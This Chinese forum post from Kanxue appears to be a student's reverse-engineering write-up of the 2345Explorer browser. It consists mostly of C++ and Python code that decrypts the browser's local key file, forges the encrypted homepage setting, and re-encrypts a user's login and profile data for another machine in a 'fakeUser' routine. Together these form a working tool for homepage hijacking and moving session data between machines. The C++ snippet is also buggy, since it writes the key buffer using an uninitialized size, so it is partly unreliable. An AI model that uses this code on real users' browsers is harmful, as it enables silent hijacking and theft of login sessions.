本文为看雪论坛精华文章
看雪论坛作者ID:三猫
最近对浏览器比较感兴趣,于是对某浏览器做了一些无脑逆向,有一点点小小的收获,第一次发文,没什么技术含量的东西。
写得超级烂,大佬们喷轻点(心里承受能力弱) 。
ps:大四狗刚开始实习,想学学移动安全,求大佬们给点方向吧。
该浏览器在未登录时和登录时设置主页有些区别。具体有四点内容:
chrome.1652dd4: DecrypturlKeyFromFile(byte **urlKey)
chrome.164f224: SaveHomePage(this,byte **urlKey,byte **url)
chrome.164F65A: BuildJson(byte **url,byte**json)
chrome.164F77C:Encrypt(byte **json,byte **urlKey,byte **encryptData)
chrome.164F8B6: SaveVerifyFile(byte **encryptData)
void SetHomePage(byte *url)
{
unsigned char prefixJson[] = { "homepage" };
unsigned char rootKey[] = { "xxxxxxxxxxxxxxxxx" };
char *keyPath = "C:\\Users\\xxx\\AppData\\Local\\2345Explorer\\User Data\\Default\\Syn\\HardwareInfo2.dat";
char *pageFile = "C:\\Users\\xxx\\AppData\\Local\\2345Explorer\\User Data\\Default\\page_file.dat";
HANDLE hFile = CreateFileA(keyPath,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile==INVALID_HANDLE_VALUE)
{
return;
}
DWORD bytesRead = 0;
DWORD dwSize = GetFileSize(hFile, NULL);
UCHAR *encryptKey = new UCHAR[dwSize];
BOOL bRet = ReadFile(hFile, encryptKey, dwSize, &bytesRead, NULL);
CloseHandle(hFile);
if (bRet == FALSE)
{
return;
}
byte *key = AESCBCPK5Decrypt(encryptKey, rootKey);
key[16] = 0;
string json = string("{\"") + (char*)prefixJson + "\":\"" + (char*)url + "\"}";
byte* encryptData = AESCBCPK5Encrypt(json, key);
hFile = CreateFileA(pageFile,
GENERIC_READ|GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
return;
}
DWORD dataSize, bytesWrite;
WriteFile(hFile, encryptKey, dataSize, &bytesWrite, NULL);
CloseHandle(hFile);
}
import binascii
from Crypto.Cipher import AES
class AESCBCDeEncrypt:
def __init__(self,key):
self.key=key
self.mode = AES.MODE_CBC
self.bs = 16
self.PADDING = lambda s: s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
def encrypt(self, text):
generator = AES.new(self.key, self.mode, self.key)
text=self.PADDING(text)
crypt = generator.encrypt(text)
crypted_str = binascii.b2a_hex(crypt)
return crypted_str,crypt
def decrypt(self, text):
generator = AES.new(self.key, self.mode, self.key)
return generator.decrypt(text)
def setPageWithLogin(url):
file = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\yyy\UserPrefs'
macDecode = open(r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\HardwareInfo2.dat', 'rb').read()
keyDecoder = AESCBCDeEncrypt('rootKey')
key = keyDecoder.decrypt(macDecode)[:16]
dataDecoder = AESCBCDeEncrypt(key)
fileData = open(file, 'rb').read()
data = dataDecoder.decrypt(fileData)
fix = data.find('"startup_urls":[]}}') + len('"startup_urls":[]}}')
data=data[:fix]
index = data.find('"homepage":') + len('"homepage":')
index2 = data.find(',"pref_client"')
url='"'+url+'"'
data=data[:index]+url+data[index2:]
str,binData=dataDecoder.encrypt(data)
f=open(r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\yyy\UserPrefs','wb')
f.write(binData)
f.close()
def decrypt(dataPath,keyPath):
rootKey=''
keyRaw=open(keyPath,'rb').read()
keyDecoder = AESCBCDeEncrypt(rootKey)
key = keyDecoder.decrypt(keyRaw)[:16]
dataDecoder = AESCBCDeEncrypt(key)
dataRaw=open(dataPath,'rb').read()
dataDecoder = AESCBCDeEncrypt(key)
return dataDecoder.decrypt(dataRaw)
def encrypt(dataRaw,keyPath):
rootKey = ''
keyRaw = open(keyPath, 'rb').read()
keyDecoder = AESCBCDeEncrypt(rootKey)
key = keyDecoder.decrypt(keyRaw)[:16]
dataDecoder = AESCBCDeEncrypt(key)
dataDecoder = AESCBCDeEncrypt(key)
return dataDecoder.encrypt(dataRaw)
def filterinfo(info,mark):
index=info.rfind(mark)
return info[:index+1]
def fakeUser():
localKeyFile = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\HardwareInfo2.dat'
otherKeyFile = r'C:\Users\xxx\Desktop\other.dat'
loginFle = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\yyy\Login DataV2'
userinfoFile = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\UserInfo.dat'
logininfo = filterinfo(decrypt(loginFle, localKeyFile), '}')
loginhex, loginRaw = encrypt(logininfo, otherKeyFile)
f = open(r'C:\Users\xxx\Desktop\FakerLogin DataV2', 'wb')
f.write(loginRaw)
f.close()
userinfo = filterinfo(decrypt(userinfoFile, localKeyFile), '\n')
userinfoHex, userinfoRaw = encrypt(userinfo, otherKeyFile)
f = open(r'C:\Users\xxx\Desktop\FakerUserInfo.dat', 'wb')
f.write(userinfoRaw)
f.close()
def setPageWithoutLogin(url):
file = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\page_file.dat'
macDecode = open(r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\HardwareInfo2.dat', 'rb').read()
keyDecoder = AESCBCDeEncrypt('rootKey')
key = keyDecoder.decrypt(macDecode)[:16]
dataDecoder = AESCBCDeEncrypt(key)
json='{"homepage":"url"}'
json=json.replace('url',url)
f=open(file,'wb')
f.write(dataDecoder.encrypt(json)[1])
f.close()
if __name__ == '__main__':
fakeUser()
setPageWithoutLogin("iloveChina")
setPageWithLogin("iloveChina")
看雪ID:三猫
https://bbs.pediy.com/user-784599.htm
推荐文章++++
* Metasploit BlueKeep漏洞利用模块简要分析